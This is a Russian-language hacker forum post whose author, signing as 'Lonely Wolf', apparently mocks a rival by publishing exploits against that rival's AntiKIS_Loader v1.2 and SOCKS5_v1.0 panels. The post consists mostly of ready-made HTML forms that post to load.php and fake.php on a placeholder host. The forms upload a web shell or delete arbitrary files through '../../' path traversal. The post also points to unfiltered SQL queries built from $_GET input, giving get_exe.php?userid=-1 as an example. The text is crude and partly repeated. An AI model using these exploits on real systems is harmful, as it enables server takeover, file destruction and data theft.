Пожалуйста, обратите внимание, что пользователь заблокирован
Короче что бы некоторые "умные" как они считают личности поменьше говорили на форумах. Первый сплойт.
Под сокс:
Инжекты на каждом углу.
Просто друшлаг.
Внимание! Я думаю что файлы load.php и fake.php там не случайно можете просто зайти на них, это своего рода шеллы, позволяющие удалить/закачать любой файл.
Я думаю автор не раз этим пользовался в своих целях.
По поводу инжектов, к примеру антикисс, файл get_exe.php?userid=-1
Видим запросы
// получаем данные для userid
В SOCKS5_v1.0 тоже самое только файл берём com.php
// Одинокий Волк
<!--//
***********************************************************************************
* Sploit for AntiKIS_Loader v1.2 *
* *
* Сплойт был написан, что бы показать bduser что он еблан, *
* т.к. любому кодеру это видно по коду. *
* *
* Одинокий Волк (Lonely Wolf) *
***********************************************************************************
//-->
<center><h3>Сплойт под ебланский софт, special for bduser.</h3></center>
<p style="background-color:#EEEEEE;border:1px #CCCCCC solid;margin:3px;">Такого гавно-кода я уже давно не видел, куча инжектов, заливка шелла, удаление файлов 0о</p>
<form action="http://www.evilhost.ru/admin/load.php" method="POST" enctype="multipart/form-data">
<p style="background-color:#EEEEEE;border:1px #CCCCCC solid;margin:3px;">
Укажите в коде form action="url" до файла load.php, пример: http://www.host.ru/admin/load.php<br />
File - выберите шелл для загрузки
Local file - укажите файл локальный какое имя будет, пример: ../../test.php
</p>
<b>File:</b> <input type="file" name="filename">
<b>Local file:</b> <input type="text" name="f" value="test.php">
<input type="submit" value="Залить!">
</form>
<form action="http://www.evilhost.ru/admin/load.php" method="POST">
<p style="background-color:#EEEEEE;border:1px #CCCCCC solid;margin:3px;">
Укажите в коде form action="url" до файла load.php, пример: http://www.host.ru/admin/load.php<br />
Local file - укажите файл локальный какой надо удалить, пример: ../../test.php
</p>
<b>Local file:</b> <input type="text" name="f" value="../../test.php">
<input type="submit" value="Залить!">
</form>
Под сокс:
<!--//
***********************************************************************************
* Sploit for SOCKS5_v1.0 *
* *
* Сплойт был написан, что бы показать bduser что он еблан, *
* т.к. любому кодеру это видно по коду. *
* *
* Одинокий Волк (Lonely Wolf) *
***********************************************************************************
//-->
<center><h3>Сплойт под ебланский софт, special for bduser.</h3></center>
<p style="background-color:#EEEEEE;border:1px #CCCCCC solid;margin:3px;">Такого гавно-кода я уже давно не видел, куча инжектов, заливка шелла, удаление файлов 0о</p>
<form action="http://www.evilhost.ru/admin/fake.php" method="POST" enctype="multipart/form-data">
<p style="background-color:#EEEEEE;border:1px #CCCCCC solid;margin:3px;">
Укажите в коде form action="url" до файла fake.php, пример: http://www.host.ru/admin/fake.php<br />
File - выберите шелл для загрузки
Local file - укажите файл локальный какое имя будет, пример: ../../test.php
</p>
<b>File:</b> <input type="file" name="filename">
<b>Local file:</b> <input type="text" name="f" value="test.php">
<input type="submit" value="Залить!">
</form>
<form action="http://www.evilhost.ru/admin/fake.php" method="POST">
<p style="background-color:#EEEEEE;border:1px #CCCCCC solid;margin:3px;">
Укажите в коде form action="url" до файла load.php, пример: http://www.host.ru/admin/fake.php<br />
Local file - укажите файл локальный какой надо удалить, пример: ../../test.php
</p>
<b>Local file:</b> <input type="text" name="f" value="../../test.php">
<input type="submit" value="Залить!">
</form>
Инжекты на каждом углу.
Просто друшлаг.
Внимание! Я думаю что файлы load.php и fake.php там не случайно можете просто зайти на них, это своего рода шеллы, позволяющие удалить/закачать любой файл.
Я думаю автор не раз этим пользовался в своих целях.
По поводу инжектов, к примеру антикисс, файл get_exe.php?userid=-1
Видим запросы
// получаем данные для userid
и$result = mysql_query("SELECT * FROM `mx_comps5` WHERE `userid` = '$userid'", $db);
До этого фильтрации нигде нет, тупо:$result = mysql_query("UPDATE `mx_comps5` SET `ansercom` = 1 where `userid` = '$userid'", $db);
// получаем имя нашего компа
$userid = $_GET['name'];
if($userid == "") $userid = "default";
В SOCKS5_v1.0 тоже самое только файл берём com.php
// Одинокий Волк